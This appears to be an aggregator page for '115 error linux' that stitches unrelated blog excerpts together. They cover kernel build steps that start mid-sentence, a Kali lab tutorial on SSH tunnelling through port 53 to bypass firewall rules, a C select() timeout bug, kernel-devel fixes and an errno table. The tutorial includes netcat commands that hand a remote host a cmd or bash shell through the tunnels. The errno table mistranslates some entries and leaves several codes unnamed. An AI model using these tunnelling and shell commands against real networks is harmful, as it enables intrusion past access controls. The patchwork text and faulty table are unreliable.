115 error linux
2015-07-01 22:53:13 sanitywolf 阅读数 207

/var/tmp/portage/sys-kernel/debian-sources-3.2.29/temp/config,然后cd /var/tmp/portage/sys-kernel/debian-sources-3.2.29/work/linux-3.2.29,用make menuconfig 来load ../../temp/config ,就可在菜单中查看最后参加内核编译的配置。

为什么要将lib改成lib64呢?因为在我们构建的文件系统里,lib是个指向lib64的符号链接,如果不将编译结果的lib改名,随后的cp -r 操作会失败。

step4:设置时区。命令如下:

ln -sf /usr/share/zoneinfo/Asia/Shanghai  /etc/localtime

step5:设主机名和域名。命令如下:

cd /etc

echo "127.0.0.1 mywolf localhost" > hosts

sed -i -e 's/hostname=.*/hostname="mywolf"/' conf.d/hostname

step6:配置fstab。

这个要在最后装到目标系统里时,再做对应的调整。命令如下:

cat >/etc/fstab <<EOF

## /etc/fstab: static file system information.

##

## The root filesystem should have a pass number of either 0 or 1.

## All other filesystems should have a pass number of 0 or greater than 1.

##

## NOTE: If your BOOT partition is ReiserFS, add the notail option to opts.

##

## See the manpage fstab(5) for more information.

##

## <fs> <mountpoint>   <type>   <opts> <dump/pass>

#

#/dev/sda1   /boot   ext2 noauto,noatime 1 2

#/dev/sda2   none   swap sw 0 0

#/dev/sda3   /   xfs noatime 0 1

##/dev/cdrom  /mnt/cdrom  auto noauto,ro 0 0

EOF

step7:配置网络。命令如下:

cd /etc/init.d

ln -s netif.lo netif.eth0    #将eth0当成本地回环

cd ../conf.d

echo 'config_eth0="192.168.1.10 netmask 255.255.255.0 brd 192.168.1.255"' >> net

2018-04-06 23:46:37 Kevinhanser 阅读数 439

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 简介

  • SSH 支持双向通信隧道

    • 将其他 TCP 端口的通信通过 SSH 链接来转发
    • 用 SSH 作为传输协议,对流量自动加解密
    • 突破防火墙访问规则的限制,可用于翻墙
  • SSH 本地端口转发

    • 使效果类似于 rinetd
    • 将一本地端口与远程服务器建立隧道
  • 建立双向安全隧道

    • 将其他 TCP 端口的通信通过 SSH 链接来转发
    • 用 SSH 作为传输协议,对流量自动加解密
    • 突破防火墙访问规则的限制,可用于翻墙
  • 本地端口转发

    • 本机侦听端口,访问转发到远程主机指定端口
  • 远程端口转发

    • 远程侦听端口,访问转发到本机主机指定端口
  • 动态隧道模式

2. SSH 本地端口转发

  • 环境要求防火墙只允许内网53端口访问外网

  • 将一本地端口与远程服务器建立隧道

    • Web 服务器在远程:ssh -fCNg -L :: user@ -p

    • Web 服务器在本地:ssh -fCNg -L :localhost: user@ -p

    • -f 后台运行进程

    • -N 不执行登录 shell(不显示登录的界面)

    • -C 进行压缩,节省带宽

    • -g 复用访问时作为网关,支持多主机访问本地侦听端口

    • 网关模式转发 RDP、NC shell

    • 端口转发基于家里起来的 SSH 隧道,隧道中断端口转发中断

    • 只能在建立隧道时创建转发,不能为已有隧道增加端口转发

  • Web 服务器在远程

    • 环境拓扑

        本地 xubuntu <--hostonly--> firewall <--bridge--> kali(SSH)
        firewall <--bridge--> win2003(http)
      
    • win2003

        桥接:192.168.1.124
        开启远程桌面
      
    • m0n0wall

      在这里插入图片描述

    • kali

      • 环境

          桥接
          ip:192.168.1.110
          vim /etc/ssh/sshd_config
          PermitRootLogin yes
          Port 53
          PasswordAuthentication yes
          systemctl  restart ssh.service 
        

        在这里插入图片描述

      • 设置

    • 本地 xubuntu

        hostonly:1.1.1.12
      
        ssh -fCNg -L <listen port>:<remote ip>:<remote port> user@<ssh server> -p <ssh server port>
        # ssh	-L	webserver	kali机器
        root@kali:~# ssh -L 7001:192.168.1.13:80 root@192.168.1.14 -p 53
      
        # 终端窗口关闭即断开连接
        -f 后台运行进程
      

      在这里插入图片描述

      在这里插入图片描述

      在这里插入图片描述

      在这里插入图片描述

        # -----------------------------------------
      
        # 使用 53 端口 登录 rdp 3389 端口
        root@lamp:~# ssh -L 7003:192.168.1.13:3389 root@192.168.1.110 -p 53
      

      在这里插入图片描述

      在这里插入图片描述

        root@lamp:~# apt-get install rdesktop
      
        # -----------------------------------------
      
  • Web 服务器在代理主机本地

    • kali

        root@kali:~# systemctl restart apache2.service
      
    • 本地 xubuntu

        ssh -fCNg -L <listen port>:localhost:<remote port> user@<ssh server> -p <ssh port>
        root@lamp:~# ssh -L 7002:localhost:80 root@192.168.1.110 -p 53
      

      在这里插入图片描述

      在这里插入图片描述

      在这里插入图片描述

  • 网关模式复用

      	# 通过 本地 xubuntu 最为代理,使局域网内的主机都可以访问外网
      	-g 复用访问时作为网关,支持多主机访问本地侦听端口
      	root@lamp:~# ssh -CfNg -L 7004:192.168.1.13:3389 root@192.168.1.110 -p 53
      ![在这里插入图片描述](https://img-blog.csdnimg.cn/20190413171429870.png)
    
      	# 使 winxp 通过 xbuntu 作为代理 ,建立 nc shell
      	win2003:
      	C:\>nc -nvlp 3333
    
      	xbuntu:
      	ssh -CfNg -L 7006:192.168.1.13:3333 root@192.168.1.110 -p 53
    
      	winxp:
      	C:\>nc 1.1.1.12 7006 -e cmd
    

3. SSH 远程端口转发

  • 由于 ACL 等原因,SSH 与应用连接建立方向相反

  • 本地端口转发

    • SSH 客户端+应用客户端位于 FW 一端
    • SSH 服务器+应用服务器位于另一端
  • 远程端口转发

    • SSH 客户端、应用客户端位于 FW 两端
    • SSH 服务器、应用服务器位于 FW 两端
  • ssh -fCNg -R :: user@ -p

  • 之所以成为远程,是因为 SSH 侦听端口开在远程的 SSH Server(kali) 上

  • 侦听端口永远在客户端一方

  • 远程端口转发测试环境

    • win2003 作为远程 server

        hostonly:1.1.1.11
        开启远程桌面
      
    • xubuntu

        hostonly:1.1.1.12
        
        ssh -CfNg -R 7001:1.1.1.11:80 root@192.168.1.110 -p 53
        ssh -CfNg -R 7001:1.1.1.11:3389 root@192.168.1.110 -p 53
        # 侦听在 kali 上,侦听地址 127.0.0.1
      

      在这里插入图片描述

      在这里插入图片描述

      在这里插入图片描述

        root@kali:~# rdesktop 127.0.0.1:7002
      

      在这里插入图片描述

  • nc shell

    • win2003

        C:\>nc -nvlp 444
      
    • xubuntu

        # 在 kali 侦听 444
        ssh -CfNg -R 7003:1.1.1.11:444 root@192.168.1.110 -p 53
      
    • kali

        root@kali:~# nc 127.0.0.1:7003 -c bash
      

4. 动态端口转发

  • 本地、远程端口转发都需要固定应用服务器IP、Port

    • 应用端口繁多,诸葛转发效率低
    • 某些应用不固定端口
    • 某些网站不支持IP直接访问
    • 使用非受信网络上网时保护流量不被嗅探
  • 本地侦听 socks4/5 代理端口

    • 由 SSH server 决定如何转发
    • 作为翻墙代理使用
    • 配置客户端代理(浏览器)
    • 使用 proxychains 支持无代理客户端
    • ssh -CfNg -D 7001 root@1.1.1.1 -p 2121
  • 测试环境

    • kali

        桥接:192.168.1.14
      
    • xubuntu

        hostonly:1.1.1.12
        ssh -CfNg -D 7009 root@192.168.1.14 -p 53
      

      在这里插入图片描述

    • win2007

        hostonly:1.1.1.11
        仅主机,无法上外网
      

      设置代理
      在这里插入图片描述

      可以正常访问百度
      在这里插入图片描述

5. X协议转发

  • 远程登陆 Linux GUI 运行图形化界面工具

    • VNC
    • X windows
  • 防火墙限制访问时

  • 测试环境

    • kali

        桥接:192.168.1.14
      
    • xubuntu

        hostonly:1.1.1.12
        ssjh -X root@192.168.1.14 -p 53
        # 所有的操作都是记录在 kali 中,本地只是查看和操作
      

      在这里插入图片描述

      xubuntu 打开图形化界面处理文字
      在这里插入图片描述

      kali 中查看结果
      在这里插入图片描述

2016-06-13 19:37:33 spotatoes 阅读数 2202

或者你会发现,你在编写程序时,不注意,或者一个很不起眼的写法,可它会给你带来很无奈的错误,让你很久才会发现,原来这个问题是这么回事。

1、常见的写法问题

1
2
3
4
5
6
7
8
9
fd_set fd;
FD_ZERO(&fd);
FD_SET( skt, &fd);
do
{
  int n = select( skt+1, &fd, 0,0, 0);
  if ( n == -1 ) break;
  else if ( n > 0) break;
}while(true);

这个问题看似不怎么,根据原理select会重置参数,所以fd这个参数在调用完select之后会被更改,所以下次执行select必须重新设置fd,就是说要将 FD_ZERO(&fd); FD_SET( skt, &fd);放在do,while里面,即每次select都要先初始化fdset;

2、另外做超时时可能会出现115错误,linux下面使用常见错误,这个问题我也遇到过,发现是一个很犀利的写法

select最后一个参数是timeval指针,这个指针也需要和fd一样,在每次select都要重新设置,如下面代码

 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
//ERROR
timeval tv; tv.sec = 0;tv.usec = 10;
do
{
   fd_set fd; FD_ZERO(&fd); FD_SET(skt,&fd);
 int n =  select( skt + 1, &fd, 0,0, &tv );//执行完这句tv就被置0了
 if ( n ==-1 || n>0) break;
}while( true );
//OK
do
{
   timeval tv; tv.sec = 0;tv.usec = 10;
   fd_set fd; FD_ZERO(&fd); FD_SET(skt,&fd);
 int n =  select( skt + 1, &fd, 0,0, &tv );//执行完这句tv就被置0了
 if ( n ==-1 || n>0) break;
}while( true );

这是我在写一个超时计算代码时发现的问题,有一个函数发送数据,需要在指定的时间内发送完,如果超过时间就返回真实发送长度。

那么,你可能需要在多次send之间来计算哪些是超时的,假如我传一个30秒的超时,你不能只select一次,将时间设置为超时,因为这样有问题,就是在第一次select成功之后,在send的时候可能没有发送完所有数据,还要不断的发送,在再次发送时超时就不好计算了,因为你上次select用的30秒,把时间用光了,并且你也不知道select到底用了多少时间。

我们可以将30秒划分为几个小的秒单位,比较每次select用1秒的时间,这样每次select或send超时都计1秒时间 ,在不断的累加就可以了。刚好在累加的时候如果你把timeval参数写在 do,while外面

那么只有第一次是正常的,第二次timeval变成 tv.sec = 0,tv.usec = 0;这样会造成select超时计算失误,因为tv值0表示不等待直接返回,假如此时发送缓冲已满,立马返回超时,这样你累加1秒时间就不准。

 

我当时测试 的是,设置30秒,结果只等 了一秒就返回超时了,打印日志显示select返回0确实是有30次,可是除了第一次有延迟,后面的基本上是同时显示出来的,就说明后面select根本没有等待,后来发现这个timeval被置0了,我呢个去,不发现不知道,一发现太肯我了。

除声明外,跑步客文章均为原创,转载请以链接形式标明本文地址

本文地址:  http://www.paobuke.com/develop/c/pbk1371.html

2015-03-01 12:10:07 iteye_10809 阅读数 20

1 /bin/sh: cc: command not found  or make cc Command not found

原因:因为gcc 编译器没有安装

yum 安装:yum install gcc

验证是否安装成功:rpm -qa | grep gcc

 

2  /lib/modules/3.10.0-123.el7.x86_64/build: No such file or directory.  Stop.

cd /usr/src/kernels/  check 是否该目录下没有文件

如果没有需要,说明没有安装 内核开发包

安装内核开发包: yum install kernel-devel

检查安装成功与否:

rpm -qa | grep kernel-devel
kernel-devel-3.10.0-123.20.1.el7.x86_64//标示安装成功
如果有文件,
需要重新做一下连接 :

cd  /lib/modules/3.10.0-123.el7.x86_64

ln -s ../../../usr/src/kernels/3.10.0-123.el7.x86_64/build

 


 

2018-06-08 17:08:17 qq_34870631 阅读数 909
EPERM 1 Operation not permitted 操作不允许
ENOENT 2 No such file or directory 文件/路径不存在
ESRCH 3 No such process 进程不存在
EINTR 4 Interrupted system call 中断的系统调用
EIO 5 Input/output error I/O错误
ENXIO 6 No such device or address 设备/地址不存在
E2BIG 7 Argument list too long 参数列表过长
ENOEXEC 8 Exec format error 执行格式错误
EBADF 9 Bad file descriptor 错误文件编号
ECHILD 10 No child processes 子进程不存在
EAGAIN 11 Try again  重试
ENOMEM 12 Out of memory 内存不足
EACCES 13 Permission denied 无权限
EFAULT 14 Bad address 地址错误
ENOTBLK 15 Block device required 需要块设备
EBUSY 16 Device or resource busy 设备或资源忙
EEXIST 17 File exists 文件已存在
EXDEV 18 Invalid Cross-device link 跨设备链路
ENODEV 19 No such device 设备不存在
ENOTDIR 20 Not a directory 目录不存在
EISDIR 21 Is a directory 是目录
EINVAL 22 Invalid argument 无效参数
ENFILE 23 File table overflow 无效参数
EMFILE 24 Too many open files 打开的文件过多
ENOTTY 25 Not a tty device 非tty设备
ETXTBSY 26 Text file busy 文本文件忙
EFBIG 27 File too large 文件太大
ENOSPC 28 No space left on device 设备无空间
ESPIPE 29 Illegal seek 非法查询
EROFS 30 Read-only file system 只读文件系统
EMLINK 31 Too many links 链接太多
EPIPE 32 Broken pipe 管道破裂
EDOM 33 Math argument out of domain of func  参数超出函数域
ERANGE 34 Math result not representable 结果无法表示
EDEADLK 35 Resource deadlock would occur 资源将发生死锁
ENAMETOOLONG 36 Filename too long 文件名太长
ENOLCK 37 No record locks available 没有可用的记录锁
ENOSYS 38 Function not implemented 函数未实现
ENOTEMPTY 39 Directory not empty 目录非空
ELOOP 40 Too many symbolic links encountered 遇到太多符号链接
EWOULDBLOCK 41 Same as EAGAIN 操作会阻塞
ENOMSG 42 No message of desired type 没有符合需求类型的消息
EIDRM 43 Identifier removed 标识符已删除
ECHRNG 44 Channel number out of range 通道编号超出范围
EL2NSYNC 45 Level 2 not synchronized level2不同步
EL3HLT 46 Level 3 halted 3级停止
EL3RST 47 Level 3 reset 3级重置
ELNRNG 48 Link number out of range 链接编号超出范围
EUNATCH 49 Protocol driver not attached 协议驱动程序没有连接
ENOCSI 50 No CSI structure available 没有可用的CSI结构
EL2HLT 51 Level 2 halted 2级停止
EBADE 52 Invalid exchange 无效交换
EBADR 53 Invalid request descriptor 无效请求描述
EXFULL 54 Exchange full 交换完全
ENOANO 55 No anode 无元素节点
EBADRQC 56 Invalid request code 无效请求码
EBADSLT 57 Invalid slot 无效插槽
EDEADLOCK  - Same as EDEADLK
EBFONT 59 Bad font file format 错误的字体文件格式
ENOSTR 60 Device not a stream 不是流设备
ENODATA 61 No data available 无数据
ETIME 62 Timer expired 计时器到期
ENOSR 63 Out of streams resources 流资源不足
ENONET 64 Machine is not on the network 机器不在网络上
ENOPKG 65 Package not installed 包未安装
EREMOTE 66 Object is remote 是远程对象
ENOLINK 67 Link has been severed 链接正在服务中
EADV 68 Advertise error 广告错误
ESRMNT 69 Srmount error
ECOMM 70 Communication error on send 发送过程中通讯错误
EPROTO 71 Protocol error 协议错误
EMULTIHOP 72 Multihop attempted 多跳尝试
EDOTDOT 73 RFS specific error RFS特定错误
EBADMSG 74 Not a data message 不是数据类型消息
EOVERFLOW 75 Value too large for defined data type 对指定的数据类型来说值太大
ENOTUNIQ 76 Name not unique on network 网络上名字不唯一
EBADFD 77 File descriptor in bad state 文件描述符状态错误
EREMCHG 78 Remote address changed 远程地址改变
ELIBACC 79 Cannot access a needed shared library 无法访问需要的共享库
ELIBBAD 80 Accessing a corrupted shared library 访问损坏的共享库
ELIBSCN 81 A .lib section in an .out is corrupted 库部分在an.out损坏
ELIBMAX 82 Linking in too many shared libraries 试图链接太多的共享库
ELIBEXEC 83 Cannot exec a shared library directly 不能直接运行共享库
EILSEQ 84 Illegal byte sequence 非法字节序
ERESTART 85 Interrupted system call should be restarted 应重新启动被中断的系统调用
ESTRPIPE 86 Streams pipe error 流管错误
EUSERS 87 Too many users 用户太多
ENOTSOCK 88 Socket operation on non-socket 在非套接字上进行套接字操作
EDESTADDRREQ 89 Destination address required 需要目的地址
EMSGSIZE 90 Message too long 消息太长
EPROTOTYPE 91 Protocol wrong type for socket 错误协议类型
ENOPROTOOPT 92 Protocol not available 协议不可用
EPROTONOSUPPORT 93 Protocol not supported 不支持协议
ESOCKTNOSUPPORT 94 Socket type not supported 不支持套接字类型
EOPNOTSUPP 95 Operation not supported on transport endpoint 操作上不支持传输端点
EPFNOSUPPORT 96 Protocol family not supported 不支持协议族
EAFNOSUPPORT 97 Address family not supported by protocol 协议不支持地址群
EADDRINUSE 98 Address already in use 地址已被使用
EADDRNOTAVAIL 99 Cannot assign requested address 无法分配请求的地址
ENETDOWN 100 Network is down 网络已关闭
ENETUNREACH 101 Network is unreachable 网络不可达
ENETRESET 102 Network dropped connection because of reset 网络由于复位断开连接
ECONNABORTED 103 Software caused connection 软件导致连接终止
ECONNRESET 104 Connection reset by peer 连接被对方复位
ENOBUFS 105 No buffer space available 没有可用的缓存空间
EISCONN 106 Transport endpoint is already connected 传输端点已连接
ENOTCONN 107 Transport endpoint is not connected 传输端点未连接
ESHUTDOWN 108 Cannot send after transport endpoint shutdown  传输端点关闭后不能在发送
ETOOMANYREFS 109 Too many references 太多的引用
ETIMEDOUT 110 Connection timed 连接超时
ECONNREFUSED 111 Connection refused 连接被拒绝
EHOSTDOWN 112 Host is down 主机已关闭
EHOSTUNREACH 113 No route to host 无法路由到主机
EALREADY 114 Operation already 操作已在进程中
EINPROGRESS 115 Operation now in 进程中正在进行的操作
ESTALE 116 Stale NFS file handle 过时的NFS文件句柄
EUCLEAN 117 Structure needs cleaning 结构需要清除
ENOTNAM 118 Not a XENIX-named 不是XENIX 命名
ENAVAIL 119 No XENIX semaphores 没有XENIX信号量
EISNAM 120 Is a named type file 是命名类型文件
EREMOTEIO 121 Remote I/O error 远程I/O错误
EDQUOT 122 Quota exceeded 超出配额
ENOMEDIUM 123 No medium found 未发现介质
EMEDIUMTYPE 124 Wrong medium type 错误介质类型
E 125 Operation canceled 取消操作
E 126 Required key not available 所需密钥不可用
E 127 Key has expired 密钥已过期
E 128 Key has been revoked 密钥已被吊销
E 129 Key was rejected by service 密钥被服务拒绝
E 130 Owner died 所有者被删除
E 131 State not recoverable 不可恢复状态

Linux Error

阅读数 733

linux error

阅读数 321

linux error no

阅读数 510

linux ERROR

阅读数 720

Linux Error

阅读数 571

没有更多推荐了,返回首页